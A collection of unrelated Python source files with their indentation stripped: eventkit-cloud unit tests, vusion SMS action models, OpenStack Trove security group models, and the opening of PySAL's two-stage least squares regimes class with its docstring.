mock_open().__enter__().write.assert_called_once_with(expected_xml)
@patch("eventkit_cloud.tasks.helpers.set_cache_value")
@patch("django.db.connection.close")
def test_update_progress(self, mock_close, mock_set_cache_value):
uid = "1234"
estimated = timezone.now()
update_progress(uid, progress=50, estimated_finish=estimated)
mock_close.assert_called_once()
mock_set_cache_value.assert_has_calls(
[
call(uid=uid, attribute="progress", model_name="ExportTaskRecord", value=50),
call(uid=uid, attribute="estimated_finish", model_name="ExportTaskRecord", value=estimated),
]
)
def test_find_in_zip(self):
zip_filepath = os.path.join(os.path.dirname(__file__), "files/test_zip_1.zip")
found_file = find_in_zip(
zip_filepath=zip_filepath,
stage_dir="example/dir",
extension="json",
archive_extension="zip",
matched_files=[],
extract=False,
)
self.assertEqual(found_file, f"/vsizip/{zip_filepath}/test_geojson.json")
def test_find_in_zip_no_extension(self):
zip_filepath = os.path.join(os.path.dirname(__file__), "files/test_zip_1.zip")
found_file = find_in_zip(
zip_filepath=zip_filepath, stage_dir="example/dir", archive_extension="zip", matched_files=[], extract=False
)
self.assertEqual(found_file, f"/vsizip/{zip_filepath}/test_csv.csv")
def test_find_in_zip_no_extension_nested_folder(self):
zip_filepath = os.path.join(os.path.dirname(__file__), "files/test_zip_2.zip")
found_file = find_in_zip(
zip_filepath=zip_filepath, stage_dir="example/dir", archive_extension="zip", matched_files=[], extract=False
)
self.assertEqual(found_file, f"/vsizip/{zip_filepath}/inner/inner_inner/inner_inner_inner/test_geojson.json")
|
|
import re
from math import ceil
from vusion.error import MissingField, VusionError, InvalidField, MissingData
from vusion.persist import Model
from vusion.persist.participant.participant import Participant
from vusion.const import TAG_REGEX, LABEL_REGEX
from vusion.utils import clean_phone
from vumi.log import log
class Action(Model):
MODEL_TYPE = 'action'
MODEL_VERSION = '2'
ACTION_TYPE = None
##TODO add subcondition on type action
fields = {
'subconditions': {
'required': False,
'valid_conditions': lambda v: getattr(v, 'valid_conditions')(),
},
'condition-operator': {
'required': False,
'valid_value': lambda v: v['condition-operator'] in ['all-subconditions', 'any-subconditions']
},
'set-condition': {
'required': True,
'valid_value': lambda v: v['set-condition'] in [None, 'condition'],
'required_subfield': lambda v: getattr(v, 'required_subfields')(
v['set-condition'],
{'condition':['subconditions', 'condition-operator']}),
},
'type-action': {
'required': True,
'valid_value': lambda v: v['type-action'] in [
'optin',
'optout',
'reset',
'feedback',
'unmatching-answer',
'tagging',
'enrolling',
'profiling',
'delayed-enrolling',
'proportional-tagging',
'proportional-labelling',
'remove-question',
'remove-reminders',
'remove-deadline',
'offset-conditioning',
'message-forwarding',
'url-forwarding',
'sms-forwarding',
'sms-invite',
'sms-mo',
'save-content-variable-table']},
}
subcondition_fields = {
'subcondition-field': {
'required': True,
},
'subcondition-operator': {
'required': True,
},
'subcondition-parameter': {
'required': True,
}
}
subcondition_values = {
'tagged':{
'with': '.*',
'not-with': '.*'},
'labelled':{
'with': '.*:.*',
'not-with': '.*:.*'},
}
def __init__(self, **kwargs):
kwargs.update({'type-action':self.ACTION_TYPE})
super(Action, self).__init__(**kwargs)
def upgrade(self, **kwargs):
if kwargs['model-version'] == '1':
kwargs['set-condition'] = None
kwargs['model-version'] = '2'
return kwargs
def __eq__(self, other):
if isinstance(other, Action):
return self.payload == other.payload
return False
def __str__(self):
return "Do:%s payload=%s" % (self.get_type(), repr(self.payload))
def __repr__(self):
return str(self)
def __getitem__(self, key):
return self.payload[key]
def __setitem__(self, key, value):
self.payload[key] = value
def process_fields(self, fields):
return fields
def validate_fields(self):
self._validate(self, self.fields)
def valid_conditions(self):
if not 'subconditions' in self:
return True
for subcondition in self['subconditions']:
self._validate(subcondition, self.subcondition_fields)
self.valid_subcondition_value(subcondition)
return True
def valid_subcondition_value(self, subconditon):
if not subconditon['subcondition-field'] in self.subcondition_values:
raise InvalidField("%s=%s is not valid" % ('subcondition-field', subconditon['subcondition-field']))
operators = self.subcondition_values[subconditon['subcondition-field']]
if not subconditon['subcondition-operator'] in operators:
raise InvalidField("%s=%s is not valid" % ('subcondition-operator', subconditon['subcondition-operator']))
parameter_regex = re.compile(operators[subconditon['subcondition-operator']])
if not parameter_regex.match(subconditon['subcondition-parameter']):
raise InvalidField("%s=%s is not valid" % ('subcondition-parameter', subconditon['subcondition-parameter']))
def get_type(self):
return self.ACTION_TYPE
def assert_field_present(self, *fields):
for field in fields:
if field not in self.payload:
raise MissingField(field)
def assert_subfield_present(self, field, *subfields):
for subfield in subfields:
if subfield not in self[field]:
raise MissingField(subfield)
def assert_list_field_present(self, elements, *fields):
if elements is None:
return
for element in elements:
for field in fields:
if field not in element:
raise MissingField(field)
def get_as_dict(self):
action_dict = {'type-action': self.get_type()}
for key in self.payload:
action_dict[key] = self.payload[key]
return action_dict
def has_condition(self):
return self['set-condition'] == 'condition'
def get_condition_mongodb(self):
if not self.has_condition():
return {}
return Participant.from_conditions_to_query(
self['condition-operator'], self['subconditions'])
def get_condition_mongodb_for(self, phone, session_id):
query = self.get_condition_mongodb()
if '$and' in query:
query['$and'].insert(0, {'phone': phone, 'session-id': session_id})
elif '$or' in query:
query = {'$and': [{'phone': phone,'session-id': session_id},
query]}
else:
query.update({'phone': phone,
'session-id': session_id})
return query
class OptinAction(Action):
ACTION_TYPE = 'optin'
def validate_fields(self):
super(OptinAction, self).validate_fields()
class OptoutAction(Action):
ACTION_TYPE = 'optout'
def validate_fields(self):
super(OptoutAction, self).validate_fields()
class ResetAction(Action):
ACTION_TYPE = 'reset'
def before_validate(self):
if not 'keep-tags' in self.payload:
self['keep-tags'] = None
if not 'keep-labels' in self.payload:
self['keep-labels'] = None
super(ResetAction, self).before_validate()
def validate_fields(self):
super(ResetAction, self).validate_fields()
self.assert_field_present('keep-tags', 'keep-labels')
def get_keep_tags(self, participant_tags):
tags = []
if len(participant_tags) > 0:
if self['keep-tags'] is not None and len(self['keep-tags']) > 0:
for tag in participant_tags:
if tag in self['keep-tags']:
tags.append(tag)
return tags
def get_keep_labels(self, participant_labels):
labels = []
if len(participant_labels) > 0:
if self['keep-labels'] is not None and len(self['keep-labels']) > 0:
for participant_label in participant_labels:
if participant_label['label'] in self['keep-labels']:
labels.append(participant_label)
return labels
class FeedbackAction(Action):
ACTION_TYPE = 'feedback'
def validate_fields(self):
super(FeedbackAction, self).validate_fields()
self.assert_field_present('content')
class SmsMoAction(Action):
ACTION_TYPE = 'sms-mo'
def validate_fields(self):
super(SmsMoAction, self).validate_fields()
self.assert_field_present('mo-content')
class UnMatchingAnswerAction(Action):
ACTION_TYPE = 'unmatching-answer'
def validate_fields(self):
super(UnMatchingAnswerAction, self).validate_fields()
self.assert_field_present('answer')
class TaggingAction(Action):
ACTION_TYPE = 'tagging'
def validate_fields(self):
super(TaggingAction, self).validate_fields()
self.assert_field_present('tag')
class EnrollingAction(Action):
ACTION_TYPE = 'enrolling'
def validate_fields(self):
super(EnrollingAction, self).validate_fields()
self.assert_field_present('enroll')
class DelayedEnrollingAction(Action):
ACTION_TYPE = 'delayed-enrolling'
def validate_fields(self):
super(DelayedEnrollingAction, self).validate_fields()
self.assert_field_present(
'enroll',
'offset-days')
self.assert_subfield_present(
'offset-days',
'days',
'at-time')
class ProfilingAction(Action):
ACTION_TYPE = 'profiling'
def validate_fields(self):
super(ProfilingAction, self).validate_fields()
self.assert_field_present('label', 'value')
class RemoveQuestionAction(Action):
ACTION_TYPE = 'remove-question'
def validate_fields(self):
super(RemoveQuestionAction, self).validate_fields()
self.assert_field_present('dialogue-id', 'interaction-id')
class RemoveRemindersAction(Action):
ACTION_TYPE = 'remove-reminders'
def validate_fields(self):
super(RemoveRemindersAction, self).validate_fields()
self.assert_field_present('dialogue-id', 'interaction-id')
class RemoveDeadlineAction(Action):
ACTION_TYPE = 'remove-deadline'
def validate_fields(self):
super(RemoveDeadlineAction, self).validate_fields()
self.assert_field_present('dialogue-id', 'interaction-id')
class OffsetConditionAction(Action):
ACTION_TYPE = 'offset-conditioning'
def validate_fields(self):
super(OffsetConditionAction, self).validate_fields()
self.assert_field_present('interaction-id', 'dialogue-id')
class ProportionalAction(Action):
pass
class ProportionalTagging(ProportionalAction):
ACTION_TYPE = 'proportional-tagging'
def validate_fields(self):
super(ProportionalTagging, self).validate_fields()
self.assert_field_present('proportional-tags')
self.assert_list_field_present(self['proportional-tags'], *['tag', 'weight'])
def get_proportional_tags(self):
return self['proportional-tags']
def set_tag_count(self, tag, count):
for i, proportional_tag in enumerate(self['proportional-tags']):
if proportional_tag['tag'] == tag:
proportional_tag.update({'count': count})
self['proportional-tags'][i] = proportional_tag
break
def get_tags(self):
tags = []
for proportional_tag in self['proportional-tags']:
tags.append(proportional_tag['tag'])
return tags
def get_totals(self):
weight_total = 0
count_total =0
for proportional_tag in self['proportional-tags']:
weight_total = weight_total + (int(proportional_tag['weight']) or 0)
count_total = count_total + (proportional_tag['count'] if 'count' in proportional_tag else 0)
return weight_total, count_total
def get_tagging_action(self):
weight_total, count_total = self.get_totals()
for proportional_tag in self['proportional-tags']:
weight_tag = int(proportional_tag['weight'])
count_expected = ceil(count_total * weight_tag / weight_total)
count_tag = (proportional_tag['count'] if 'count' in proportional_tag else 0)
if count_expected >= count_tag:
return TaggingAction(**{'tag': proportional_tag['tag']})
return TaggingAction(**{'tag': self['proportional-tags'][0]['tag']})
class ProportionalLabelling(ProportionalAction):
ACTION_TYPE = 'proportional-labelling'
def validate_fields(self):
super(ProportionalLabelling, self).validate_fields()
self.assert_field_present('proportional-labels')
self.assert_list_field_present(self['proportional-labels'], *['label-value', 'weight'])
self.assert_field_present('label-name')
def get_proportional_labels(self):
return self['proportional-labels']
def get_label_name(self):
return self['label-name']
def set_count(self, label_value, count):
for i, proportional_label in enumerate(self['proportional-labels']):
if proportional_label['label-value'] == label_value:
proportional_label.update({'count': count})
self['proportional-labels'][i] = proportional_label
break
def get_labels(self):
labels = []
for proportional_label in self['proportional-labels']:
labels.append({
'label': self['label-name'],
'value': proportional_label['label-value']})
return labels
def get_totals(self):
weight_total = 0
count_total = 0
for proportional_label in self['proportional-labels']:
weight_total = weight_total + (int(proportional_label['weight']) or 0)
count_total = count_total + (proportional_label['count'] if 'count' in proportional_label else 0)
return weight_total, count_total
def get_labelling_action(self):
weight_total, count_total = self.get_totals()
for proportional_label in self['proportional-labels']:
weight_label = int(proportional_label['weight'])
count_expected = ceil(count_total * weight_label / weight_total)
count_label = (proportional_label['count'] if 'count' in proportional_label else 0)
if count_expected >= count_label:
return ProfilingAction(**{
'label': self['label-name'],
'value': proportional_label['label-value']})
return ProfilingAction(**{
'label': self['label-name'],
'value': self['proportional-labels'][0]['label-value']})
class UrlForwarding(Action):
ACTION_TYPE = 'url-forwarding'
def validate_fields(self):
super(UrlForwarding, self).validate_fields()
self.assert_field_present('forward-url')
class SmsForwarding(Action):
ACTION_TYPE = 'sms-forwarding'
def before_validate(self):
if not 'set-forward-message-condition' in self.payload:
self['set-forward-message-condition'] = None
super(SmsForwarding, self).before_validate()
def validate_fields(self):
super(SmsForwarding, self).validate_fields()
self.assert_field_present(
'forward-to',
'forward-content',
'set-forward-message-condition')
def get_forward_message_condition(self, context):
if self['set-forward-message-condition'] is None:
return {}
if self['forward-message-condition-type'] == 'phone-number':
second_word = context.get_message_second_word()
if second_word is None:
return {'phone': ''}
return {'phone': clean_phone(second_word)}
return {}
def has_no_participant_feedback(self):
if self['set-forward-message-condition'] is None:
return False
if ('forward-message-no-participant-feedback' not in self.payload
or self['forward-message-no-participant-feedback'] is None
or self['forward-message-no-participant-feedback'] == ''):
return False
return True
def get_no_participant_feedback(self):
if 'forward-message-no-participant-feedback' in self:
return self['forward-message-no-participant-feedback']
return None
def get_query_selector(self, participant, context):
##replace custom part of the selector
customized_selector = (self['forward-to'] or '')
custom_regexp = re.compile(r'\[participant.(?P<key1>[^\.\]]+)\]')
matches = re.finditer(custom_regexp, customized_selector)
for match in matches:
match = match.groupdict() if match is not None else None
if match is None:
continue
if participant is None:
raise MissingData('No participant supplied for this message.')
participant_label_value = participant.get_data(match['key1'])
if not participant_label_value:
raise MissingData("Participant %s doesn't have a label %s" %
(participant['phone'], match['key1']))
replace_match = '[participant.%s]' % match['key1']
customized_selector = self['forward-to'].replace(
replace_match, participant_label_value)
selectors = [selector.strip() for selector in customized_selector.split(",")]
##build the query
query = self.get_forward_message_condition(context)
self.add_condition_to_query(query, {'session-id': {'$ne': None}})
self.add_condition_to_query(query, {'phone': {'$ne': participant['phone']}})
for selector in selectors:
if re.match(TAG_REGEX, selector):
self.add_condition_to_query(query, {'tags': selector})
elif re.match(LABEL_REGEX, selector):
profile = selector.split(':')
self.add_condition_to_query(query, {'profile': {'$elemMatch': {'label': profile[0], 'value': profile[1]}}})
return query
def add_condition_to_query(self, query, conditions):
for key, value in conditions.iteritems():
if key in query:
if '$and' in query:
query['$and'].append({key: value})
else:
query['$and'] = [{key: query[key]}, {key: value}]
query.pop(key, None)
else:
query[key] = value
class SmsInviteAction(Action):
ACTION_TYPE = 'sms-invite'
def validate_fields(self):
super(SmsInviteAction, self).validate_fields()
self.assert_field_present(
'invite-content',
'invitee-tag',
'feedback-inviter')
class SaveContentVariableTable(Action):
ACTION_TYPE = 'save-content-variable-table'
def validate_fields(self):
super(SaveContentVariableTable, self).validate_fields()
self.assert_field_present(
'scvt-attached-table',
'scvt-row-keys',
'scvt-col-key-header',
'scvt-col-extras')
self.assert_list_field_present(
self['scvt-row-keys'], *['scvt-row-header', 'scvt-row-value'])
self.assert_list_field_present(
self['scvt-col-extras'], *['scvt-col-extra-header', 'scvt-col-extra-value'])
def get_match(self):
i = 1
match = {}
for key in self['scvt-row-keys']:
match.update({'key%s' % i: key['scvt-row-value']})
i = i + 1
match.update({'key%s' % i: self['scvt-col-key-header']})
return match
def get_extra_matchs(self):
i = 1
row_match = {}
for key in self['scvt-row-keys']:
row_match.update({'key%s' % i: key['scvt-row-value']})
i = i + 1
matchs = []
for extra_cv in self['scvt-col-extras']:
j = i
match = row_match.copy()
match.update({'key%s' % i: extra_cv['scvt-col-extra-header']})
matchs.append((match, extra_cv['scvt-col-extra-value']))
return matchs
def get_table_id(self):
return self['scvt-attached-table']
def action_generator(**kwargs):
# Condition to be removed when Dialogue structure freezed
if 'type-action' not in kwargs:
kwargs['type-action'] = kwargs['type-answer-action']
if kwargs['type-action'] == 'optin':
return OptinAction(**kwargs)
elif kwargs['type-action'] == 'optout':
return OptoutAction(**kwargs)
elif kwargs['type-action'] == 'reset':
return ResetAction(**kwargs)
elif kwargs['type-action'] == 'enrolling':
return EnrollingAction(**kwargs)
elif kwargs['type-action'] == 'delayed-enrolling':
return DelayedEnrollingAction(**kwargs)
elif kwargs['type-action'] == 'tagging':
return TaggingAction(**kwargs)
elif kwargs['type-action'] == 'profiling':
return ProfilingAction(**kwargs)
elif kwargs['type-action'] == 'feedback':
return FeedbackAction(**kwargs)
elif kwargs['type-action'] == 'sms-mo':
return SmsMoAction(**kwargs)
elif kwargs['type-action'] == 'unmatching-answer':
return UnMatchingAnswerAction(**kwargs)
elif kwargs['type-action'] == 'remove-reminders':
return RemoveRemindersAction(**kwargs)
elif kwargs['type-action'] == 'remove-deadline':
return RemoveDeadlineAction(**kwargs)
elif kwargs['type-action'] == 'offset-conditioning':
return OffsetConditionAction(**kwargs)
elif kwargs['type-action'] == 'proportional-tagging':
return ProportionalTagging(**kwargs)
elif kwargs['type-action'] == 'proportional-labelling':
return ProportionalLabelling(**kwargs)
elif kwargs['type-action'] in ['message-forwarding', 'url-forwarding']:
return UrlForwarding(**kwargs)
elif kwargs['type-action'] == 'sms-forwarding':
return SmsForwarding(**kwargs)
elif kwargs['type-action'] == 'sms-invite':
return SmsInviteAction(**kwargs)
elif kwargs['type-action'] == 'save-content-variable-table':
return SaveContentVariableTable(**kwargs)
raise VusionError("%r not supported" % kwargs)
class Actions():
def __init__(self):
self.actions = []
def append(self, action):
if action.get_type() in ["optin", "enrolling", "reset"]:
i = 0
if action.get_type() == "enrolling":
i = self.get_position_after(["optin", "reset"])
if action.get_type() == "reset":
i = self.get_position_after(["optin"])
self.actions.insert(i, action)
else:
self.actions.append(action)
def get_position_after(self, action_types):
if len(self.actions) == 0:
return 0
i = 0
while (self.actions[i].get_type() in action_types):
i = i + 1
if len(self.actions) <= i:
return i
return i
def extend(self, actions):
for action in actions:
self.append(action)
def contains(self, action_type):
for action in self.actions:
if action.get_type() == action_type:
return True
return False
def items(self):
return self.actions.__iter__()
def __getitem__(self, key):
return self.actions[key]
def get_priority_action(self):
return self.actions.pop(0)
def __len__(self):
return len(self.actions)
def __eq__(self, other):
if not isinstance(other, Actions):
return False
if len(self.actions) != len(other.actions):
return False
for i in range(0, len(self)):
if not self.actions[i] == other.actions[i]:
return False
return True
def clear_all(self):
self.actions = []
def keep_only_remove_action(self):
for action in self.actions:
if (action.get_type() != 'remove-reminders' and
action.get_type() != 'remove-deadline' and
action.get_type() != 'remove-question'):
self.actions.remove(action)
|
|
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Model classes for Security Groups and Security Group Rules on instances.
"""
from trove.common import cfg
from trove.common import exception
from trove.db.models import DatabaseModelBase
from trove.common.models import NetworkRemoteModelBase
from trove.openstack.common import log as logging
from trove.openstack.common.gettextutils import _
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
def persisted_models():
return {
'security_group': SecurityGroup,
'security_group_rule': SecurityGroupRule,
'security_group_instance_association':
SecurityGroupInstanceAssociation,
}
class SecurityGroup(DatabaseModelBase):
_data_fields = ['id', 'name', 'description', 'user', 'tenant_id',
'created', 'updated', 'deleted', 'deleted_at']
@property
def instance_id(self):
return SecurityGroupInstanceAssociation\
.get_instance_id_by_security_group_id(self.id)
@classmethod
def create_sec_group(cls, name, description, context):
try:
remote_sec_group = RemoteSecurityGroup.create(name,
description,
context)
if not remote_sec_group:
raise exception.SecurityGroupCreationError(
"Failed to create Security Group")
else:
return cls.create(
id=remote_sec_group.data()['id'],
name=name,
description=description,
user=context.user,
tenant_id=context.tenant)
except exception.SecurityGroupCreationError as e:
LOG.exception("Failed to create remote security group")
raise e
@classmethod
def create_for_instance(cls, instance_id, context):
# Create a new security group
name = "%s_%s" % (CONF.trove_security_group_name_prefix, instance_id)
description = _("Security Group for %s") % instance_id
sec_group = cls.create_sec_group(name, description, context)
# Currently this locked down by default, since we don't create any
# default security group rules for the security group.
# Create security group instance association
SecurityGroupInstanceAssociation.create(
security_group_id=sec_group["id"],
instance_id=instance_id)
return sec_group
@classmethod
def get_security_group_by_id_or_instance_id(self, id, tenant_id):
try:
return SecurityGroup.find_by(id=id,
tenant_id=tenant_id,
deleted=False)
except exception.ModelNotFoundError:
return SecurityGroupInstanceAssociation.\
get_security_group_by_instance_id(id)
def get_rules(self):
return SecurityGroupRule.find_all(group_id=self.id,
deleted=False)
def delete(self, context):
try:
sec_group_rules = self.get_rules()
if sec_group_rules:
for rule in sec_group_rules:
rule.delete(context)
RemoteSecurityGroup.delete(self.id, context)
super(SecurityGroup, self).delete()
except exception.TroveError:
LOG.exception('Failed to delete security group')
raise exception.TroveError("Failed to delete Security Group")
@classmethod
def delete_for_instance(cls, instance_id, context):
try:
association = SecurityGroupInstanceAssociation.find_by(
instance_id=instance_id,
deleted=False)
if association:
sec_group = association.get_security_group()
if sec_group:
sec_group.delete(context)
association.delete()
except (exception.ModelNotFoundError,
exception.TroveError):
LOG.info(_('Security Group with id: %(id)s '
'already had been deleted')
% {'id': instance_id})
class SecurityGroupRule(DatabaseModelBase):
_data_fields = ['id', 'parent_group_id', 'protocol', 'from_port',
'to_port', 'cidr', 'group_id', 'created', 'updated',
'deleted', 'deleted_at']
@classmethod
def create_sec_group_rule(cls, sec_group, protocol, from_port,
to_port, cidr, context):
try:
remote_rule_id = RemoteSecurityGroup.add_rule(
sec_group_id=sec_group['id'],
protocol=protocol,
from_port=from_port,
to_port=to_port,
cidr=cidr,
context=context)
if not remote_rule_id:
raise exception.SecurityGroupRuleCreationError(
"Failed to create Security Group Rule")
else:
# Create db record
return cls.create(
id=remote_rule_id,
protocol=protocol,
from_port=from_port,
to_port=to_port,
cidr=cidr,
group_id=sec_group['id'])
except exception.SecurityGroupRuleCreationError as e:
LOG.exception("Failed to create remote security group")
raise e
def get_security_group(self, tenant_id):
return SecurityGroup.find_by(id=self.group_id,
tenant_id=tenant_id,
deleted=False)
def delete(self, context):
try:
# Delete Remote Security Group Rule
RemoteSecurityGroup.delete_rule(self.id, context)
super(SecurityGroupRule, self).delete()
except exception.TroveError:
LOG.exception('Failed to delete security group')
raise exception.SecurityGroupRuleDeletionError(
"Failed to delete Security Group")
class SecurityGroupInstanceAssociation(DatabaseModelBase):
_data_fields = ['id', 'security_group_id', 'instance_id',
'created', 'updated', 'deleted', 'deleted_at']
def get_security_group(self):
return SecurityGroup.find_by(id=self.security_group_id,
deleted=False)
@classmethod
def get_security_group_by_instance_id(cls, id):
association = SecurityGroupInstanceAssociation.find_by(
instance_id=id,
deleted=False)
return association.get_security_group()
@classmethod
def get_instance_id_by_security_group_id(cls, secgroup_id):
association = SecurityGroupInstanceAssociation.find_by(
security_group_id=secgroup_id,
deleted=False)
return association.instance_id
class RemoteSecurityGroup(NetworkRemoteModelBase):
_data_fields = ['id', 'name', 'description', 'rules']
def __init__(self, security_group=None, id=None, context=None):
if id is None and security_group is None:
msg = "Security Group does not have id defined!"
raise exception.InvalidModelError(msg)
elif security_group is None:
driver = self.get_driver(context)
self._data_object = driver.get_sec_group_by_id(group_id=id)
else:
self._data_object = security_group
@classmethod
def create(cls, name, description, context):
"""Creates a new Security Group."""
driver = cls.get_driver(context)
sec_group = driver.create_security_group(
name=name, description=description)
return RemoteSecurityGroup(security_group=sec_group)
@classmethod
def delete(cls, sec_group_id, context):
"""Deletes a Security Group."""
driver = cls.get_driver(context)
driver.delete_security_group(sec_group_id)
@classmethod
def add_rule(cls, sec_group_id, protocol, from_port,
to_port, cidr, context):
"""Adds a new rule to an existing security group."""
driver = cls.get_driver(context)
sec_group_rule = driver.add_security_group_rule(
sec_group_id, protocol, from_port, to_port, cidr)
return sec_group_rule.id
@classmethod
def delete_rule(cls, sec_group_rule_id, context):
"""Deletes a rule from an existing security group."""
driver = cls.get_driver(context)
driver.delete_security_group_rule(sec_group_rule_id)
|
|
import numpy as np
import regimes as REGI
import user_output as USER
import multiprocessing as mp
import scipy.sparse as SP
from utils import sphstack, set_warn, RegressionProps_basic, spdot, sphstack
from twosls import BaseTSLS
from robust import hac_multi
import summary_output as SUMMARY
from platform import system
"""
Two-stage Least Squares estimation with regimes.
"""
__author__ = "Luc Anselin luc.anselin@asu.edu, Pedro V. Amaral pedro.amaral@asu.edu, David C. Folch david.folch@asu.edu"
class TSLS_Regimes(BaseTSLS, REGI.Regimes_Frame):
"""
Two stage least squares (2SLS) with regimes
Parameters
----------
y : array
nx1 array for dependent variable
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, excluding the constant
yend : array
Two dimensional array with n rows and one column for each
endogenous variable
q : array
Two dimensional array with n rows and one column for each
external exogenous variable to use as instruments (note:
this should not contain any variables from x)
regimes : list
List of n values with the mapping of each
observation to a regime. Assumed to be aligned with 'x'.
constant_regi: ['one', 'many']
Switcher controlling the constant term setup. It may take
the following values:
* 'one': a vector of ones is appended to x and held
constant across regimes
* 'many': a vector of ones is appended to x and considered
different per regime (default)
cols2regi : list, 'all'
Argument indicating whether each
column of x should be considered as different per regime
or held constant across regimes (False).
If a list, k booleans indicating for each variable the
option (True if one per regime, False to be held constant).
If 'all' (default), all the variables vary by regime.
regime_err_sep : boolean
If True, a separate regression is run for each regime.
robust : string
If 'white', then a White consistent estimator of the
variance-covariance matrix is given.
If 'hac', then a HAC consistent estimator of the
variance-covariance matrix is given.
If 'ogmm', then Optimal GMM is used to estimate
betas and the variance-covariance matrix.
Default set to None.
gwk : pysal W object
Kernel spatial weights needed for HAC estimation. Note:
matrix must have ones along the main diagonal.
sig2n_k : boolean
If True, then use n-k to estimate sigma^2. If False, use n.
vm : boolean
If True, include variance-covariance matrix in summary
cores : boolean
Specifies if multiprocessing is to be used
Default: no multiprocessing, cores = False
Note: Multiprocessing may not work on all platforms.
name_y : string
Name of dependent variable for use in output
name_x : list of strings
Names of independent variables for use in output
name_yend : list of strings
Names of endogenous variables for use in output
name_q : list of strings
Names of instruments for use in output
name_regimes : string
Name of regimes variable for use in output
name_w : string
Name of weights matrix for use in output
name_gwk : string
Name of kernel weights matrix for use in output
name_ds : string
Name of dataset for use in output
Attributes
----------
betas : array
kx1 array of estimated coefficients
u : array
nx1 array of residuals
predy : array
nx1 array of predicted y values
n : integer
Number of observations
y : array
nx1 array for dependent variable
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, including the constant
Only available in dictionary 'multi' when multiple regressions
(see 'multi' below for details)
yend : array
Two dimensional array with n rows and one column for each
endogenous variable
Only available in dictionary 'multi' when multiple regressions
(see 'multi' below for details)
q : array
Two dimensional array with n rows and one column for each
external exogenous variable used as instruments
Only available in dictionary 'multi' when multiple regressions
(see 'multi' below for details)
vm : array
Variance covariance matrix (kxk)
regimes : list
List of n values with the mapping of each
observation to a regime. Assumed to be aligned with 'x'.
constant_regi: [False, 'one', 'many']
Ignored if regimes=False. Constant option for regimes.
Switcher controlling the constant term setup. It may take
the following values:
* 'one': a vector of ones is appended to x and held
constant across regimes
* 'many': a vector of ones is appended to x and considered
different per regime
cols2regi : list, 'all'
Ignored if regimes=False. Argument indicating whether each
column of x should be considered as different per regime
or held constant across regimes (False).
If a list, k booleans indicating for each variable the
option (True if one per regime, False to be held constant).
If 'all', all the variables vary by regime.
regime_err_sep : boolean
If True, a separate regression is run for each regime.
kr : int
Number of variables/columns to be "regimized" or subject
to change by regime. These will result in one parameter
estimate by regime for each variable (i.e. nr parameters per
variable)
kf : int
Number of variables/columns to be considered fixed or
global across regimes and hence only obtain one parameter
estimate
nr : int
Number of different regimes in the 'regimes' list
name_y : string
Name of dependent variable for use in output
name_x : list of strings
Names of independent variables for use in output
name_yend : list of strings
Names of endogenous variables for use in output
name_q : list of strings
Names of instruments for use in output
name_regimes : string
Name of regimes variable for use in output
name_w : string
Name of weights matrix for use in output
name_gwk : string
Name of kernel weights matrix for use in output
name_ds : string
Name of dataset for use in output
multi : dictionary
Only available when multiple regressions are estimated,
i.e. when regime_err_sep=True and no variable is fixed
across regimes.
Contains all attributes of each individual regression
Examples
--------
We first need to import the needed modules, namely numpy to convert the
data we read into arrays that ``spreg`` understands and ``pysal`` to
perform all the analysis.
>>> import numpy as np
>>> import pysal
Open data on NCOVR US County Homicides (3085 areas) using pysal.open().
This is the DBF associated with the NAT shapefile. Note that
pysal.open() also reads data in CSV format; since the actual class
requires data to be passed in as numpy arrays, the user can read their
data in using any method.
>>> db = pysal.open(pysal.examples.get_path("NAT.dbf"),'r')
Extract the HR90 column (homicide rates in 1990) from the DBF file and make it the
dependent variable for the regression. Note that PySAL requires this to be
an numpy array of shape (n, 1) as opposed to the also common shape of (n, )
that other packages accept.
>>> y_var = 'HR90'
>>> y = np.array([db.by_col(y_var)]).reshape(3085,1)
Extract UE90 (unemployment rate) and PS90 (population structure) vectors from
the DBF to be used as independent variables in the regression. Other variables
can be inserted by adding their names to x_var, such as x_var = ['Var1','Var2','...]
Note that PySAL requires this to be an nxj numpy array, where j is the
number of independent variables (not including a constant). By default
this model adds a vector of ones to the independent variables passed in.
>>> x_var = ['PS90','UE90']
>>> x = np.array([db.by_col(name) for name in x_var]).T
In this case we consider RD90 (resource deprivation) as an endogenous regressor.
We tell the model that this is so by passing it in a different parameter
from the exogenous variables (x).
>>> yd_var = ['RD90']
>>> yd = np.array([db.by_col(name) for name in yd_var]).T
Because we have endogenous variables, to obtain a correct estimate of the
model, we need to instrument for RD90. We use FP89 (families below poverty)
for this and hence put it in the instruments parameter, 'q'.
>>> q_var = ['FP89']
>>> q = np.array([db.by_col(name) for name in q_var]).T
The different regimes in this data are given according to the North and
South dummy (SOUTH).
>>> r_var = 'SOUTH'
>>> regimes = db.by_col(r_var)
Since we want to perform tests for spatial dependence, we need to specify
the spatial weights matrix that includes the spatial configuration of the
observations into the error component of the model. To do that, we can open
an already existing gal file or create a new one. In this case, we will
create one from ``NAT.shp``.
>>> w = pysal.rook_from_shapefile(pysal.examples.get_path("NAT.shp"))
Unless there is a good reason not to do it, the weights have to be
row-standardized so every row of the matrix sums to one. Among other
things, this allows to interpret the spatial lag of a variable as the
average value of the neighboring observations. In PySAL, this can be
easily performed in the following way:
>>> w.transform = 'r'
We can now run the regression and then have a summary of the output
by typing: model.summary
Alternatively, we can just check the betas and standard errors of the
parameters:
>>> tslsr = TSLS_Regimes(y, x, yd, q, regimes, w=w, constant_regi='many', spat_diag=False, name_y=y_var, name_x=x_var, name_yend=yd_var, name_q=q_var, name_regimes=r_var, name_ds='NAT', name_w='NAT.shp')
>>> tslsr.betas
array([[ 3.66973562],
[ 1.06950466],
[ 0.14680946],
[ 2.45864196],
[ 9.55873243],
[ 1.94666348],
[-0.30810214],
[ 3.68718119]])
>>> np.sqrt(tslsr.vm.diagonal())
array([ 0.38389901, 0.09963973, 0.04672091, 0.22725012, 0.49181223,
0.19630774, 0.07784587, 0.25529011])
"""
def __init__(self, y, x, yend, q, regimes,
w=None, robust=None, gwk=None, sig2n_k=True,
